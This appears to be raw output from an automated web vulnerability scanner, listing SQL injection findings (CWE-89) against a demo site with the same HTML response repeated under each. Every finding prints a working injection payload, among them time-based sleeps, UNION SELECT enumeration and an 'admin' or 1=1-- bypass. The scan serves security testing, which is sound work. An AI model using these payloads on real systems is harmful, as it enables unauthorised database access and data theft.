content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1392\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# pg_sleep(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1393\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#ResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1394\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \" or true--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1395Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 1=1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1396\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+\nCHAR(88)+CHAR(88)+CHAR(88)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1397\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1398\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nDemoUser1# ')) or sleep(5)='\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1399\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessaryhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1400\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ' or sleep(5)#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1401\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 1=0\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1402\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ;waitfor delay '0:0:5'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1403\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ;%00\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1404\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin' or 1=1--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1405\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 25--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 